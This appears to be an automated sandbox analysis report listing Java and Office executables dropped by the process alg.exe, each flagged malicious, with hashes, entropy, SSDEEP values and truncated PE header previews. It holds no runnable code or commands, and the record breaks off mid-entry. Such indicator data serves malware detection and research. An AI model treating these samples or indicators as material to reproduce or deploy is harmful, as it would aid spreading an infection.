                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1DF2038A00CB724F2ED5F5CF7FBA9AA8857D79EE
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:98E96CB84EDF12EABC64B25875262CA328B0E920AF61BD57B50A25731AE4CD7B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8C443293418E0B6BB9FF016FA3526AB7CAB4A5B277F2E4BF1641B55B87D4C22A2613E9C7577F94536C4BB9C2005B001E28A6F58D1D9924765C949EC5BE7EA994
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................` .....@...........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...p..........................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.535187081914585
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:oa5yiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Nq/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:724C3F109F3C2DEE495D29374D9B20A4
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3464873AC821C0BE0B83C56ACF7F4B72A7EC9A1B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CDCAC2B9508A7CB4DFD669C1E0EEEA44CAC52B5A455E9611E5C5BF73E30BA4A2
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:6F9AD29AFA41A48CAB4F5B08721CA9173AEEBAA7E33C56471EE6109F527C6B42294A8C0AD46F4F441BD54E93145C0A4DFB7B64FB58F271DB446F33564F91475C
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................&........................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.535247250827725
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:sylKiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Jm/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3F38CF2B3AAC3F1D3E561742DD0AA6FD
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E7A77B8671D953BAE6339FBD157927D08D5D5010
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6F7890025B35776CA472343B2D2EE98EF66F8EBB006B917BE658E410D11DC8CE
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:AD9C54E63E41ED15D6ABE0D8E74EBDEACF6C511F3CD6B47FAB7EAB4430A8614965FC6D1AC795B68D5598D827E1AD494FE032CD6E5641BF568E0FB57FEFED0077
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.535249928052069
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:cKlKiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:tm/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:FB3267DEDE776E18476389AA58BAD5ED
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0685FE20ECF3002672FCCEBE4058DBC2856A946E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EBFAB187D665B1DBCAA78C6B368BD1FEEF2220D031999DAD9284CD1A6360BB11
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D6730780BCE16C67129309EEC10895EC918353A7D5B11B31E268F9100AE4DC26F720A750F997BE08A1F3B338473B040FF8768DE96D82CE4F75D4C32335A1A880
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................H.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.53522469098906
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:57mqiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:1p/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:ADF96CE0A25CC533A2773B600F992833
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A254BD44D51588DD6BB1450AFBA699CEA248BF4F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A1873689C5DEB75332F3B02682BD412C4A38B15A5E596065A23F15A68336B71B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1DC8734119FCDB57B16BB89FCD27D62CE546769D294C1F3D896D5768E1F9CD265EF3E6A82EDAAC2341CA82A760B28060F8E7B8DD4118D8C2C1E20109A23C9D3D
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................Y........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.536047927122532
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:/SmuiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:KN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:73F3926CA988E09549D54D115390F9F1
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3D6F5F51B1883C3B39CD510168DC3F02EB6C87D9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:472FD1D7A485A3586B438981309D6EB3D99C1C0B893706678972931575CFB4D4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1F23E1915A6DE286FC3B027D792A03962FE6F0169F6B4D3C315FD473A77F01108C41522C901005A53BB9CC0A63B06E4BCF557A16CE2AC524BF944800952882DE
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................^W......................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5352056691842515
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:m45yiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:1y/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3D3107C29E81D2BEB4DC1FCA96AD2741
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F0F47C5C9A2E5F73C002A51BB243AF22A6D0EE5E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6781BA02BA867848251870643030927745E94AAA373C8CF1D2432AA29D60F014
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9BBA0D7410E80D1911DBDF8FF24E2F69420D08EB372F460B0B751AA075292E441020CE4B79958C55AC1B096863EA355CECEF70A820EC933B96E757A306CBBDC3
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................?.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5352370898852135
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:89/KiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:gE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:6D1F8F2ADB06D2272D0E328B1BFBDC63
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A2DACD887142A240B10607A27AE82AED18A0237D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:05EDBEF6F5D6A7EF8C9EA11D2F623BBF28D994FD1E3A46DD747BCD76C67D95A9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0B730AC3F3E31E0E1CFD47E5A3A9738EFCEFE6BB19133746EFB63C1C178E7BAE95C31557F12C26F39CA225B2AD9A6A4E35B7C9579938AC21435C3798E9AE067A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.535142779924617
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:kBmaiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Ip/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:0468CBF196279675D8391CB701C4AE82
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:7E80BE33E2E6E51B58803509AAE07CF820EDF82B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C141B0ED1673EF1BFF29D1B85543E58F30F17B0F61C20EC9AE9061B1593E10F3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CFD09DF92A5356D7B776CC37C2FA11C6EF3C64C3C43F29F8ECD5A3A45535403AC57BCABDD56003638D2DB0D8FFA4E7EA4BA492810915B7DC478FE732F4EB726B
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.535188506602876
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:R2SSiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:4F/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:6D7F3479F128145CA8D8F342CC1CFE8B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:BBE867F98805803D16622E4AA1AC1CA33ECF8605
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9AB5AA0FE8BA1A054AA3B9FC4D52D522A2265F26ACF0A25D1383C7CA4915DDCC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:FAC88D38ADDC577C7424B96851AE5386A56AFAFED1DA968892808F193F4A760453BFB14CD2ABA5F9D20558321E79B0F5CE19C8CD66A823493336BC4AE07471F6
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.535256084945096
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:0x/KiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:cE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:23F7F4255F33FED9A7246DF3CC2ECDF8
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3C462F3C1FF2C67EBF20D155D430DA893AC56ED0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D74CB9E9A9FFDF1BC6DDD88277535EE342137D7999DE38314DE209ADAB646FA8
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2CEDD33BBEFD1A685F08EB90565712BDA349BFEECA6008E22293051E6CEE5DF412372350F61171F191785D010DF6B9F82BAA584BA479F83BD4DB9C1221A1E5B1
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................?........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1358336
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.617646469239466
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:5DS/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5eLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D674CBEC042A8D791773F1CE0D3773B1
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CEBC8ACBF502EF3FE0D9BD8B2E9FFB05DC311017
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AEBD70E633BEF682D93BE8E50FED059A10CF7B9DB47C400E1830AF0CCE77CAC7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:99BA4DE5252108EFF0D2448A09B1989B9A2605404201C104FDE3B91CC3A917E74C25591D9082AC7B0C42075576C094C2AF5992630C6FD53D25476E5FE84B9637
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.............................................................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...`...@......................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1298432
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.534832434050845
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:giQeiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:db/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:65F0A6AD173F85B63875F2DB4C9B5717
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FA0B53259FB5D02EE1F13F4690CFBDAB0D512696
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:63192A9D9A7F11B71808A26FEAA541C6E9F8668E1B8EF6EADEEC39935E5554A8
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EE2E92B75EC7E3FC673FE16BB15641E4796F18C783AE78A9CB2D9CC3730ACB847E58524E6EAE284C504DC21BE9800652D85E9C8B0DF75FCCD9703231823CD847
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..................................A.......................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...`...P.......0..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1454592
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.7929599281940884
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:vi7ln3roA2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Sl3roA2LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:015BFEB82CDF168EC41065BFEAB4DEF0
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A02F8598E2CD1233C323366BE0C7ED2E45FCF9E0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3D8D839A80F5714A65885A2B46B49E60E3D0A22E612BD9EAC46E32E44E4CBC01
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B50BF39D83D1A3D8579F79FD796502560363E8CAC56AED4AF5844EE1AC919E0EA8277DB0904BC296DC61AF7AB375A1E90134CA8D53481A3101B136739AFE01F5
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................@!.....N...................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1424896
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.8166726373593365
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:5NfQPK/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:jEKLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:FC812237679D34552460B86922C31A49
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:B5CE878BF3FCCCCF18A2104D3D2F63199A3D74B6
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1026A2863140B65F25E4DE64F35BDD5964B40E25BEE465DF4D96C483631B0546
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C4A19E3AC08C516EFD7DACF89D77DE0A1DD246071F2DAFA6E664F47F916D4A247A4A7D56B8DD4D4166C32F918D973C730267908B0D04ED493ACCF63E9DF446D4
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@........................... ......9......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...p...@......................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1443328
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.837559624426855
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
